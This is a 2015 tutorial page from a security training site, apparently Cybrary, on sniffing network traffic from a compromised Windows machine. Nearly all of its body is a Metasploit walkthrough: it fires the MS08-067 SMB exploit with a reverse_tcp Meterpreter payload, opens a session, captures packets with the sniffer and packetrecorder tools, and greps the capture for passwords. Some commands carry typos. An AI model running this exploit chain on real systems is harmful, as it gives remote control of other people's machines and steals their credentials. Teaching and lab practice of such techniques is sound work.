Tutorial: Packet Sniffing

July 14, 2015 | Views: 7212

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Packet sniffing was never easy before. In the late 90’s, we used tunneling, wire Shark, MITM and SSL Striping.

After a payload of reverse_tcp in meterpreter, all we need is to use exploit “sniff

I assume you have msfconsole opened and configured.

Let’s begin…

Location and using Windows SMB exploit:

msf > use exploit/windows/smb/ms08_067_netapi


Setting payload of reverse_tcp:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp

Setting local host for ping backs:

msf exploit(ms08_067_netapi) > set LHOST x.x.x.x

Setting target host:

msf exploit(ms08_067_netapi) > set RHOST x.x.x.x

And then fire:

msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (x.x.x.x:4444 -> x.x.x.x:1921)

Yes! We got our target under control.

So now what? Just use sniffer.

meterpreter > use sniffer
Loading extension sniffer...success.

We can even see the sniffer option by pressing sniffer help.


Let’s start the sniffer:

eterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)


Here we go…

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 19 packets to PCAP file /tmp/all.cap

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 92 packets to PCAP file /tmp/all.cap

Success! We can cat and open this .cap file with winPcap and there’s one more method for sniffing called
packetRecorder in meterpreter (same as the sniffer).


Just type:
meterpreter > use packerrocerder

You can see the options in the help section. All you need is to give him a path for our records.

Before starting sniffing, we need to choose what the network interface should be for it.

meterpreter > run packetrecorder -li


After that, you’re ready to fire…!

meterpreter > run packetrecorder -i 2 -l /root/
[*] Starting Packet capture on interface 2
[+] Packet capture started
[*] Packets being saved in to /root/logs/packetrecorder/....


Again. we can use wireShark  or winPcap to see our packets.

Here, for wireshark,  just locate your file and type this command:

tshark -r recordfilename.cap |grep PASS

PASS : thisissecret
PASS : thisiscaptured


— Mutli Thinker

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. Thanks mr 🙂

  2. nice tutorial but “old” methods are in use today 🙂

  3. very nice one…

Page 1 of 212»
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?